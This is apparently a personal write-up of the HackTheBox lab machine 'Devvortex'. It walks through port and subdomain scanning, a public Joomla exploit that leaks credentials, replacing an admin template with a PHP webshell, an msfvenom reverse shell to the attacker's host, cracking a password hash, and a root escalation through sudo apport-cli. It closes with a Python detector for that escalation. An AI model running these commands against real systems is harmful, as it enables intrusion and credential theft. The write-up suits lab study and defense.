HTB Devvortex - Easy Linux Machine
It's been a little while since I last did a CTF, so I decided to jump on HTB and see what kind of machines they had. I picked an easy machine so I wouldn't be up all night obsessing. HTB boxes are generally more realistic/difficult than sites like tryhackme and offsec's proving grounds, at least in my experience.
So, as soon as I was able to get an IP for the target, I began with an nmap scan of all ports on the machine.
nmap -p- 10.10.11.242
# Nmap 7.93 scan initiated Fri Dec 29 20:34:04 2023 as: nmap -p- -o nmap.txt 10.10.11.242
Nmap scan report for 10.10.11.242
Host is up (0.033s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Fri Dec 29 20:38:22 2023 -- 1 IP address (1 host up) scanned in 258.06 seconds
I saw that only ports 22 and 80 were open, so I did some further enumerating on those ports to see what specific services were running.
nmap -sV -sC -p 22,80 10.10.11.242
There wasn't really much in the output, only that port 80 was redirecting to "http://devvortex.htb". So I opened up the /etc/hosts file and added the IP along with the domain name.
sudo nano /etc/hosts
I then visited the domain in the browser and was met with a very basic, unconfigured website.
I browsed the site a bit and realized there wasn't anything of value. I also ran a nikto scan and a dirbuster scan with no luck. I then started to think about the possibility of a subdomain, so I ran a subdomain fuzz with ffuf.
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://devvortex.htb -H "Host:FUZZ.devvortex.htb" -fs 154
I ran this same command without the -fs 154 at the end and was getting hits for almost everything, since the server answered every Host header with the same default page. I had to add -fs 154 to exclude any response whose size was 154 bytes. Almost immediately I found a subdomain for dev.
I went back to the /etc/hosts file and updated it to reflect the subdomain.
After that I was able to access the dev subdomain's web server, which again looked very generic and not configured.
I ran a dirbuster scan using the small list and found there was an administrator panel.
Once I saw this, I realized it was using Joomla. I had used joomscan on a Joomla site in a previous CTF, so I ran it to see what version this was, so that I could leverage that information to find a potential exploit or default login credentials.
joomscan -u http://dev.devvortex.htb
I was able to discover that it was version 4.4.6, so I googled "joomla 4.2.6 exploit" and found one on exploit-db.
http://www.exploit-db.com/exploits/51334
I copied the code and put it into a file named joom.rb. I then ran the exploit.
ruby joom.rb http://dev.devvortex.htb
The exploit worked and gave me a username and password, which I was going to try within the admin login panel.
lewis:P4ntherg0t1n5r3c0n##
I was able to login with those credentials. I looked around and came across a place where I could insert php code into a template that I could access from the browser.
I clicked on "System"
Then I clicked on "Administrator Templates".
Then I clicked on the "Atum Details and Files" link.
From there I clicked on "login.php". Now, in hindsight, I probably should have done something a bit different here, such as adding a small php webshell to the provided code and accessing the RCE through the URL in the browser. Instead, what I did here completely erases the login page, so anytime the user "lewis" logs in to the administrator panel, that user is going to be met with a pretty sweet php webshell that he can't edit or alter lol. So I copied the php code from White Winter Wolf because I love using it, and put it into the code section, erasing all previous code from it. As soon as I clicked "Save", it gave me a webshell.
I went to the /tmp directory and then checked to see what user I was. I knew I was going to want to upload a reverse shell immediately, so I created one using msfvenom.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f elf > shell.elf
I then set up a netcat listener on my kali machine.
nc -nvlp 4444
Then I used the upload feature on the webshell to upload the reverse shell, "shell.elf". Once it was uploaded to the /tmp directory, I made it executable and then ran it.
chmod +x shell.elf
./shell.elf
I now had an interactive shell. I ran a command to get a better shell, and then tried to connect to mysql using the credentials I previously had in hopes that there were more passwords within that database. I was able to connect and listed the databases.
I saw a database named "joomla" and decided to use it. I then listed all the tables. There were a lot of tables, but I noticed one for users, which should contain password hashes if there are more users.
There was a password hash for the user "logan"! So I grabbed that hash and ran it through john.
echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' > paul.txt
john --wordlist=/usr/share/wordlists/rockyou.txt paul.txt
A few seconds later I had the password for "logan". I exited out of mysql and went back to the interactive shell with the www-data user and tried to login as logan.
su logan
tequieromucho
Success! I was now logged in as logan. I looked for a flag in the user's home directory and was able to get the user.txt flag. Next, as I generally do first in any priv esc, I checked to see what sudo privs this user had.
sudo -l
I saw that logan was able to run sudo with the apport-cli binary. I had to do a ton of Googling to find out what this even was and how to abuse it. Essentially, when a program crashes, Apport automatically collects data about the crash and saves it in a report. apport-cli can be used to manually generate these reports. Ok cool, but how tf do I abuse this bad boy to get root??? Thanks to bdrung for showing the PoC for this, because I was pretty lost until I came across it.
http://github.com/canonical/apport/commit/e5f78cc89f1f5888b6a56b785dddcb0364c48ecb
I just followed his proof of concept and was easily able to obtain root user.
$ sudo apport-cli -c /var/crash/xxx.crash less
[...]
Please choose (S/E/V/K/I/C): v
!id
uid=0(root) gid=0(root) groups=0(root)
!done (press RETURN)
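From the blue-team side, the tell-tale sign of this priv esc is a non-root user running apport-cli through sudo, since the View option hands the report to a pager that runs as root on unpatched versions. The following is an added example (mine, not part of the original writeup) that parses the per-invocation lines sudo writes to auth.log and flags apport-cli runs elevated to root; the log lines are constructed samples in the standard sudo format, and the hostname and timestamps are made up.

```python
import re

# Constructed auth.log excerpt (sample data, not captured from the box) in the format sudo writes.
SAMPLE_AUTH_LOG = """\
Dec 29 21:02:11 host sudo:    logan : TTY=pts/0 ; PWD=/home/logan ; USER=root ; COMMAND=/usr/bin/apport-cli -c /var/crash/xxx.crash less
Dec 29 21:02:12 host sudo: pam_unix(sudo:session): session opened for user root(uid=0) by logan(uid=1000)
Dec 29 21:05:40 host sudo:    logan : TTY=pts/0 ; PWD=/home/logan ; USER=root ; COMMAND=/usr/bin/apport-cli --file-bug
Dec 29 21:06:02 host sudo:    admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt update
"""

# Matches the "user : TTY=... ; PWD=... ; USER=... ; COMMAND=..." record sudo logs per invocation.
SUDO_CMD_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)


def parse_sudo_commands(log_text):
    """Extract every sudo command-execution record from raw auth.log text."""
    return [m.groupdict() for line in log_text.splitlines()
            if (m := SUDO_CMD_RE.search(line))]


def flag_apport_cli_as_root(events):
    """Return (user, severity, command) for each apport-cli run elevated to root.

    Severity is 'high' when -c is given: that opens an existing crash report and
    leads to the interactive View prompt, whose pager runs as root on unpatched apport.
    Any other apport-cli run as root is still reported as 'medium'.
    """
    hits = []
    for e in events:
        argv = e["cmd"].split()
        if e["runas"] != "root" or not argv or not argv[0].endswith("apport-cli"):
            continue
        opens_report = "-c" in argv[1:]
        hits.append((e["user"], "high" if opens_report else "medium", e["cmd"]))
    return hits


if __name__ == "__main__":
    for user, severity, cmd in flag_apport_cli_as_root(parse_sudo_commands(SAMPLE_AUTH_LOG)):
        print(f"[{severity}] {user} -> {cmd}")
```

The same check can be pointed at a real /var/log/auth.log, and the sudoers rule itself is the root cause: a user who may run apport-cli as root should not exist on a host that has not picked up the fix in the commit linked above.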
Overall this box was on the easy side. Compared to the OffSec boxes, I think it would rate medium to hard. I learned quite a bit during the priv esc phase of this box though. Hopefully I can do more of these in the near future after taking these SANS courses. Hope you enjoyed.
-Sam